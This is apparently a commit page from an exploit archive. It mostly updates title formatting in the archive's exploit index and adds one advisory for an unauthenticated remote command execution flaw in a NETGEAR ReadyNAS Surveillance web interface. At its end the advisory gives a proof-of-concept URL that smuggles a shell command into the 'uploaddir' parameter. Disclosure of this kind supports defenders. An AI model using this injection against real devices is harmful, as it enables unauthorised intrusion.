DB: 2017-10-06
1 new exploits AyeView 2.20 - (invalid bitmap header parsing) Crash AyeView 2.20 - Invalid Bitmap Header Parsing Crash Home Web Server r1.7.1 (build 147) - Gui Thread-Memory Corruption Home Web Server r1.7.1 (build 147) - GUI Thread-Memory Corruption Mozilla Firefox 1.0.6/1.0.7 - IFRAME Handling Denial of Service Mozilla Firefox 1.0.6/1.0.7 - iFrame Handling Denial of Service Linux Kernel < 4.14.rc3 - Local Denial of Service Linux Kernel < 4.14.rc3 - Local Denial of Service SHTTPD 1.34 - (POST) Remote Buffer Overflow SHTTPD 1.34 - 'POST' Remote Buffer Overflow SlimFTPd - LIST Concatenation Overflow (Metasploit) SlimFTPd - 'LIST' Concatenation Overflow (Metasploit) NetTerm NetFTPD - USER Buffer Overflow (Metasploit) NetTerm NetFTPD - 'USER' Buffer Overflow (Metasploit) Microsoft Virtual Machine 2000/3100/3200/3300 Series - com.ms.activeX.ActiveXComponent Arbitrary Program Execution Microsoft Virtual Machine 2000/3100/3200/3300 Series - 'com.ms.activeX.ActiveXComponent' Arbitrary Program Execution Zemra Botnet CnC Web Panel - Remote Code Execution (Metasploit) Zemra Botnet (CnC Web Panel) - Remote Code Execution (Metasploit) phpMyTeam 2.0 - (smileys_dir) Remote File Inclusion phpMyTeam 2.0 - 'smileys_dir' Remote File Inclusion Galerie 3.2 - (pic) WBB Lite Addon Blind SQL Injection Galerie 3.2 - 'pic' WBB Lite Addon Blind SQL Injection Civica - Display.asp SQL Injection Civica - 'Display.asp' SQL Injection AfterLogic MailBee WebMail Pro 3.x - default.asp mode2 Parameter Cross-Site Scripting AfterLogic MailBee WebMail Pro 3.x - 'default.asp' 'mode2' Parameter Cross-Site Scripting Picosafe Web Gui - Multiple Vulnerabilities Picosafe Web GUI - Multiple Vulnerabilities HBGK DVR 3.0.0 build20161206 - Authentication Bypass HBGK DVR 3.0.0 build20161206 - Authentication Bypass NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution
This commit is contained in:
Offensive Security
parent
d4e17b950d
commit
9ee6a8e2ee
2 changed files with 33 additions and 15 deletions
27
files.csv
27
files.csv
|
|
@ -818,7 +818,7 @@ id,file,description,date,author,platform,type,port
|
|||
6660,platforms/windows/dos/6660.txt,"RhinoSoft Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
|
||||
6668,platforms/windows/dos/6668.txt,"AyeView 2.20 - '.GIF' Image Local Crash",2008-10-04,suN8Hclf,windows,dos,0
|
||||
6671,platforms/windows/dos/6671.c,"Microsoft Windows Vista - Access Violation from Limited Account Exploit (Blue Screen of Death)",2008-10-04,Defsanguje,windows,dos,0
|
||||
6672,platforms/windows/dos/6672.txt,"AyeView 2.20 - (invalid bitmap header parsing) Crash",2008-10-05,suN8Hclf,windows,dos,0
|
||||
6672,platforms/windows/dos/6672.txt,"AyeView 2.20 - Invalid Bitmap Header Parsing Crash",2008-10-05,suN8Hclf,windows,dos,0
|
||||
6673,platforms/windows/dos/6673.txt,"FastStone Image Viewer 3.6 - '.BMP' Image Crash",2008-10-05,suN8Hclf,windows,dos,0
|
||||
6689,platforms/linux/dos/6689.txt,"Konqueror 3.5.9 - (font color) Remote Crash",2008-10-06,"Jeremy Brown",linux,dos,0
|
||||
6704,platforms/linux/dos/6704.txt,"Konqueror 3.5.9 - (color/bgcolor) Multiple Remote Crash Vulnerabilities",2008-10-08,"Jeremy Brown",linux,dos,0
|
||||
|
|
@ -1029,7 +1029,7 @@ id,file,description,date,author,platform,type,port
|
|||
8512,platforms/windows/dos/8512.txt,"Counter Strike Source ManiAdminPlugin 2.0 - Remote Crash",2009-04-22,M4rt1n,windows,dos,0
|
||||
8522,platforms/windows/dos/8522.pl,"Zervit Web Server 0.3 - (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0
|
||||
8523,platforms/windows/dos/8523.txt,"Norton Ghost Support module for EasySetup wizard - Remote Denial of Service (PoC)",2009-04-23,shinnai,windows,dos,0
|
||||
8524,platforms/windows/dos/8524.txt,"Home Web Server r1.7.1 (build 147) - Gui Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0
|
||||
8524,platforms/windows/dos/8524.txt,"Home Web Server r1.7.1 (build 147) - GUI Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0
|
||||
8526,platforms/windows/dos/8526.py,"Popcorn 1.87 - Remote Heap Overflow (PoC)",2009-04-23,x.CJP.x,windows,dos,0
|
||||
8531,platforms/windows/dos/8531.pl,"SDP Downloader 2.3.0 - '.asx' Local Heap Overflow (PoC)",2009-04-24,Cyber-Zone,windows,dos,0
|
||||
8542,platforms/windows/dos/8542.php,"Icewarp Merak Mail Server 9.4.1 - 'Base64FileEncode()' Buffer Overflow (PoC)",2009-04-27,Nine:Situations:Group,windows,dos,0
|
||||
|
|
@ -3429,7 +3429,7 @@ id,file,description,date,author,platform,type,port
|
|||
26301,platforms/windows/dos/26301.txt,"Novell Groupwise Client 6.5.3 - Local Integer Overflow",2005-09-27,"Francisco Amato",windows,dos,0
|
||||
26331,platforms/multiple/dos/26331.txt,"Oracle 9.0 iSQL*Plus TLS Listener - Remote Denial of Service",2005-10-07,"Alexander Kornbrust",multiple,dos,0
|
||||
26322,platforms/windows/dos/26322.pl,"MusicBee 2.0.4663 - '.m3u' Denial of Service",2013-06-19,Chako,windows,dos,0
|
||||
26325,platforms/multiple/dos/26325.txt,"Mozilla Firefox 1.0.6/1.0.7 - IFRAME Handling Denial of Service",2005-10-05,"Tom Ferris",multiple,dos,0
|
||||
26325,platforms/multiple/dos/26325.txt,"Mozilla Firefox 1.0.6/1.0.7 - iFrame Handling Denial of Service",2005-10-05,"Tom Ferris",multiple,dos,0
|
||||
26336,platforms/multiple/dos/26336.txt,"Oracle Forms - Servlet TLS Listener Remote Denial of Service",2005-10-07,"Alexander Kornbrust",multiple,dos,0
|
||||
26340,platforms/linux/dos/26340.c,"Up-IMAPProxy 1.2.3/1.2.4 - Multiple Unspecified Remote Format String Vulnerabilities",2005-10-10,"Steve Kemp",linux,dos,0
|
||||
26341,platforms/windows/dos/26341.txt,"Microsoft Windows XP/2000/2003 - MSDTC TIP Denial of Service (MS05-051)",2005-10-11,anonymous,windows,dos,0
|
||||
|
|
@ -9799,7 +9799,7 @@ id,file,description,date,author,platform,type,port
|
|||
2458,platforms/windows/remote/2458.pl,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Exploit (1)",2006-09-29,"YAG KOHHA",windows,remote,0
|
||||
2460,platforms/windows/remote/2460.c,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Exploit (2)",2006-09-29,LukeHack,windows,remote,0
|
||||
2467,platforms/windows/remote/2467.pm,"McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - (Source) Remote Exploit (Metasploit)",2006-10-01,muts,windows,remote,81
|
||||
2482,platforms/windows/remote/2482.pl,"SHTTPD 1.34 - (POST) Remote Buffer Overflow",2006-10-05,SkOd,windows,remote,0
|
||||
2482,platforms/windows/remote/2482.pl,"SHTTPD 1.34 - 'POST' Remote Buffer Overflow",2006-10-05,SkOd,windows,remote,0
|
||||
2530,platforms/windows/remote/2530.py,"BulletProof FTP Client 2.45 - Remote Buffer Overflow (PoC)",2006-10-12,h07,windows,remote,0
|
||||
2601,platforms/windows/remote/2601.c,"Ipswitch IMail Server 2006 / 8.x - (RCPT) Remote Stack Overflow",2006-10-19,"Greg Linares",windows,remote,25
|
||||
2637,platforms/windows/remote/2637.c,"AEP SmartGate 4.3b - (GET) Arbitrary File Download Exploit",2006-10-24,prdelka,windows,remote,143
|
||||
|
|
@ -11352,13 +11352,13 @@ id,file,description,date,author,platform,type,port
|
|||
16726,platforms/windows/remote/16726.rb,"FTPPad 1.2.0 - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0
|
||||
16727,platforms/windows/remote/16727.rb,"Sasser Worm avserve - FTP PORT Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,5554
|
||||
16728,platforms/windows/remote/16728.rb,"Gekko Manager FTP Client - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0
|
||||
16729,platforms/windows/remote/16729.rb,"SlimFTPd - LIST Concatenation Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0
|
||||
16729,platforms/windows/remote/16729.rb,"SlimFTPd - 'LIST' Concatenation Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0
|
||||
16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP Server - 'Username' Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
|
||||
16731,platforms/win_x86/remote/16731.rb,"Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit)",2010-04-30,Metasploit,win_x86,remote,0
|
||||
16732,platforms/windows/remote/16732.rb,"httpdx - 'tolog()' Function Format String (Metasploit) (1)",2010-08-25,Metasploit,windows,remote,0
|
||||
16733,platforms/windows/remote/16733.rb,"FileCOPA FTP Server (Pre 18 Jul Version) - Exploit (Metasploit)",2010-04-30,Metasploit,windows,remote,21
|
||||
16734,platforms/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow (Metasploit)",2010-08-03,Metasploit,windows,remote,0
|
||||
16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - USER Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0
|
||||
16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - 'USER' Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0
|
||||
16736,platforms/windows/remote/16736.rb,"FTPShell 5.1 - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0
|
||||
16737,platforms/windows/remote/16737.rb,"EasyFTP Server 1.7.0.11 - CWD Command Stack Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
|
||||
16738,platforms/win_x86/remote/16738.rb,"AASync 2.2.1.0 (Windows x86) - Stack Buffer Overflow 'LIST' (Metasploit)",2010-11-14,Metasploit,win_x86,remote,0
|
||||
|
|
@ -12235,7 +12235,7 @@ id,file,description,date,author,platform,type,port
|
|||
20258,platforms/multiple/remote/20258.c,"HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - rpc.ypupdated Command Execution (1)",1994-02-07,"Josh D",multiple,remote,0
|
||||
20259,platforms/multiple/remote/20259.txt,"HP-UX 10/11/ IRIX 3/4/5/6 / OpenSolaris build snv / Solaris 8/9/10 / SunOS 4.1 - rpc.ypupdated Command Execution (2)",1994-02-07,anonymous,multiple,remote,0
|
||||
20500,platforms/php/remote/20500.rb,"TestLink 1.9.3 - Arbitrary File Upload (Metasploit)",2012-08-15,Metasploit,php,remote,0
|
||||
20266,platforms/windows/remote/20266.txt,"Microsoft Virtual Machine 2000/3100/3200/3300 Series - com.ms.activeX.ActiveXComponent Arbitrary Program Execution",2000-10-05,"Marcin Jackowski",windows,remote,0
|
||||
20266,platforms/windows/remote/20266.txt,"Microsoft Virtual Machine 2000/3100/3200/3300 Series - 'com.ms.activeX.ActiveXComponent' Arbitrary Program Execution",2000-10-05,"Marcin Jackowski",windows,remote,0
|
||||
20298,platforms/windows/remote/20298.c,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (1)",2000-10-17,"Gabriel Maggiotti",windows,remote,0
|
||||
20269,platforms/windows/remote/20269.txt,"Microsoft IIS 5.0 - Indexed Directory Disclosure",2000-10-04,"David Litchfield",windows,remote,0
|
||||
20273,platforms/cgi/remote/20273.txt,"Moreover CGI script - File Disclosure",2000-10-02,CDI,cgi,remote,0
|
||||
|
|
@ -15409,7 +15409,7 @@ id,file,description,date,author,platform,type,port
|
|||
38346,platforms/bsd/remote/38346.rb,"Watchguard XCS - Remote Command Execution (Metasploit)",2015-09-28,Metasploit,bsd,remote,443
|
||||
38352,platforms/windows/remote/38352.rb,"ManageEngine EventLog Analyzer - Remote Code Execution (Metasploit)",2015-09-29,Metasploit,windows,remote,8400
|
||||
38356,platforms/hardware/remote/38356.txt,"Foscam < 11.37.2.49 - Directory Traversal",2013-03-01,"Frederic Basse",hardware,remote,0
|
||||
38402,platforms/multiple/remote/38402.rb,"Zemra Botnet CnC Web Panel - Remote Code Execution (Metasploit)",2015-10-05,Metasploit,multiple,remote,0
|
||||
38402,platforms/multiple/remote/38402.rb,"Zemra Botnet (CnC Web Panel) - Remote Code Execution (Metasploit)",2015-10-05,Metasploit,multiple,remote,0
|
||||
38401,platforms/windows/remote/38401.rb,"Kaseya Virtual System Administrator (VSA) - 'uploader.aspx' Arbitrary File Upload (Metasploit)",2015-10-05,Metasploit,windows,remote,0
|
||||
38368,platforms/multiple/remote/38368.txt,"McAfee Vulnerability Manager - 'cert_cn' Parameter Cross-Site Scripting",2013-03-08,"Asheesh Anaconda",multiple,remote,0
|
||||
38370,platforms/hardware/remote/38370.txt,"PIXORD Vehicle 3G Wi-Fi Router 3GR-431P - Multiple Vulnerabilities",2015-10-01,"Karn Ganeshen",hardware,remote,0
|
||||
|
|
@ -17445,7 +17445,7 @@ id,file,description,date,author,platform,type,port
|
|||
2475,platforms/php/webapps/2475.txt,"phpBB Admin Topic Action Logging Mod 0.94b - File Inclusion",2006-10-04,SpiderZ,php,webapps,0
|
||||
2476,platforms/php/webapps/2476.txt,"PHPGreetz 0.99 - 'footer.php' Remote File Inclusion",2006-10-04,mozi,php,webapps,0
|
||||
2477,platforms/php/webapps/2477.txt,"phpBB Static Topics 1.0 - 'phpbb_root_path' File Inclusion",2006-10-04,Kw3[R]Ln,php,webapps,0
|
||||
2478,platforms/php/webapps/2478.txt,"phpMyTeam 2.0 - (smileys_dir) Remote File Inclusion",2006-10-05,"Mehmet Ince",php,webapps,0
|
||||
2478,platforms/php/webapps/2478.txt,"phpMyTeam 2.0 - 'smileys_dir' Remote File Inclusion",2006-10-05,"Mehmet Ince",php,webapps,0
|
||||
2479,platforms/php/webapps/2479.txt,"PHP Classifieds 7.1 - 'index.php' SQL Injection",2006-10-05,Kzar,php,webapps,0
|
||||
2480,platforms/php/webapps/2480.txt,"phpBB Security Suite Mod 1.0.0 - 'logger_engine.php' Remote File Inclusion",2006-10-05,SpiderZ,php,webapps,0
|
||||
2481,platforms/php/webapps/2481.txt,"Dimension of phpBB 0.2.6 - 'phpbb_root_path' Remote File Inclusions",2006-10-05,SpiderZ,php,webapps,0
|
||||
|
|
@ -20359,7 +20359,7 @@ id,file,description,date,author,platform,type,port
|
|||
6669,platforms/php/webapps/6669.txt,"JMweb - 'src' Parameter Local File Inclusion",2008-10-04,SirGod,php,webapps,0
|
||||
6670,platforms/php/webapps/6670.txt,"FOSS Gallery Admin 1.0 - Arbitrary File Upload",2008-10-04,Pepelux,php,webapps,0
|
||||
6674,platforms/php/webapps/6674.pl,"FOSS Gallery Public 1.0 - Arbitrary File Upload",2008-10-05,JosS,php,webapps,0
|
||||
6675,platforms/php/webapps/6675.pl,"Galerie 3.2 - (pic) WBB Lite Addon Blind SQL Injection",2008-10-05,J0hn.X3r,php,webapps,0
|
||||
6675,platforms/php/webapps/6675.pl,"Galerie 3.2 - 'pic' WBB Lite Addon Blind SQL Injection",2008-10-05,J0hn.X3r,php,webapps,0
|
||||
6676,platforms/php/webapps/6676.txt,"OpenNMS < 1.5.96 - Multiple Vulnerabilities",2008-10-05,"BugSec LTD",php,webapps,0
|
||||
6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 - 'id' Parameter SQL Injection",2008-10-05,Piker,php,webapps,0
|
||||
6678,platforms/php/webapps/6678.txt,"Fastpublish CMS 1.9999 - Local File Inclusion / SQL Injection",2008-10-05,~!Dok_tOR!~,php,webapps,0
|
||||
|
|
@ -30720,7 +30720,7 @@ id,file,description,date,author,platform,type,port
|
|||
28758,platforms/php/webapps/28758.txt,"osCommerce 2.2 - 'admin/tax_rates.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28759,platforms/php/webapps/28759.txt,"osCommerce 2.2 - 'admin/zones.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28761,platforms/php/webapps/28761.txt,"WikyBlog 1.2.x - 'index.php' Remote File Inclusion",2006-10-05,MoHaNdKo,php,webapps,0
|
||||
28762,platforms/asp/webapps/28762.txt,"Civica - Display.asp SQL Injection",2006-10-05,CodeXpLoder'tq,asp,webapps,0
|
||||
28762,platforms/asp/webapps/28762.txt,"Civica - 'Display.asp' SQL Injection",2006-10-05,CodeXpLoder'tq,asp,webapps,0
|
||||
28767,platforms/php/webapps/28767.txt,"AckerTodo 4.2 - 'login.php' Multiple SQL Injections",2006-10-06,"Francesco Laurita",php,webapps,0
|
||||
28768,platforms/asp/webapps/28768.html,"Emek Portal 2.1 - Uyegiris.asp SQL Injection",2006-10-06,"Dj ReMix",asp,webapps,0
|
||||
28769,platforms/php/webapps/28769.txt,"Interspire FastFind - 'index.php' Cross-Site Scripting",2006-09-27,MizoZ,php,webapps,0
|
||||
|
|
@ -31976,7 +31976,7 @@ id,file,description,date,author,platform,type,port
|
|||
30639,platforms/cgi/webapps/30639.txt,"Cart32 6.x - GetImage Arbitrary File Download",2007-10-04,"Paul Craig",cgi,webapps,0
|
||||
30640,platforms/php/webapps/30640.txt,"Stuffed Guys Stuffed Tracker - Multiple Cross-Site Scripting Vulnerabilities",2007-10-04,"Aria-Security Team",php,webapps,0
|
||||
30641,platforms/php/webapps/30641.txt,"AfterLogic MailBee WebMail Pro 3.x - 'login.php' mode Parameter Cross-Site Scripting",2007-10-05,"Ivan Sanchez",php,webapps,0
|
||||
30642,platforms/php/webapps/30642.txt,"AfterLogic MailBee WebMail Pro 3.x - default.asp mode2 Parameter Cross-Site Scripting",2007-10-05,"Ivan Sanchez",php,webapps,0
|
||||
30642,platforms/php/webapps/30642.txt,"AfterLogic MailBee WebMail Pro 3.x - 'default.asp' 'mode2' Parameter Cross-Site Scripting",2007-10-05,"Ivan Sanchez",php,webapps,0
|
||||
30647,platforms/php/webapps/30647.txt,"SNewsCMS 2.1 - 'News_page.php' Cross-Site Scripting",2007-10-08,medconsultation.ru,php,webapps,0
|
||||
30649,platforms/cgi/webapps/30649.txt,"NetWin DNews - 'Dnewsweb.exe' Multiple Cross-Site Scripting Vulnerabilities",2007-10-09,Doz,cgi,webapps,0
|
||||
30651,platforms/php/webapps/30651.txt,"Joomla! Component WebMaster-Tips.net Joomla! RSS Feed Reader 1.0 - Remote File Inclusion",2007-10-10,Cyber-Crime,php,webapps,0
|
||||
|
|
@ -37527,7 +37527,7 @@ id,file,description,date,author,platform,type,port
|
|||
40326,platforms/jsp/webapps/40326.txt,"ZKTeco ZKBioSecurity 3.0 - Directory Traversal",2016-08-31,LiquidWorm,jsp,webapps,8088
|
||||
40327,platforms/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - 'visLogin.jsp' Local Authentication Bypass",2016-08-31,LiquidWorm,jsp,webapps,0
|
||||
40328,platforms/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,jsp,webapps,8088
|
||||
40454,platforms/php/webapps/40454.txt,"Picosafe Web Gui - Multiple Vulnerabilities",2016-10-05,"Shahab Shamsi",php,webapps,0
|
||||
40454,platforms/php/webapps/40454.txt,"Picosafe Web GUI - Multiple Vulnerabilities",2016-10-05,"Shahab Shamsi",php,webapps,0
|
||||
40462,platforms/cgi/webapps/40462.py,"Witbe - Remote Code Execution",2016-10-05,BeLmar,cgi,webapps,0
|
||||
40467,platforms/php/webapps/40467.txt,"PHP Classifieds Rental Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
|
||||
40468,platforms/php/webapps/40468.txt,"B2B Portal Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
|
||||
|
|
@ -38653,3 +38653,4 @@ id,file,description,date,author,platform,type,port
|
|||
42950,platforms/php/webapps/42950.txt,"EPESI 1.8.2 rev20170830 - Cross-Site Scripting",2017-10-03,"Zeeshan Shaikh",php,webapps,0
|
||||
42953,platforms/windows/webapps/42953.txt,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution",2017-09-20,xxlegend,windows,webapps,0
|
||||
42954,platforms/php/webapps/42954.py,"ClipBucket 2.8.3 - Remote Code Execution",2017-10-04,"Meisam Monsef",php,webapps,0
|
||||
42956,platforms/hardware/webapps/42956.txt,"NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution",2017-09-27,"Kacper Szurek",hardware,webapps,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
17
platforms/hardware/webapps/42956.txt
Executable file
17
platforms/hardware/webapps/42956.txt
Executable file
|
|
@ -0,0 +1,17 @@
|
|||
# Exploit Netgear ReadyNAS Surveillance 1.4.3-16 Unauthenticated RCE
|
||||
# Date: 27.09.2017
|
||||
# Software Link: https://www.netgear.com/
|
||||
# Exploit Author: Kacper Szurek
|
||||
# Contact: https://twitter.com/KacperSzurek
|
||||
# Website: https://security.szurek.pl/
|
||||
# Category: remote
|
||||
|
||||
1. Description
|
||||
|
||||
$_GET['uploaddir'] is not escaped and passed to system() through $tmp_upload_dir.
|
||||
|
||||
https://security.szurek.pl/netgear-ready-nas-surveillance-14316-unauthenticated-rce.html
|
||||
|
||||
2. Proof of Concept
|
||||
|
||||
http://IP/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;sleep%205;%27
|
||||
Loading…
Add table
Reference in a new issue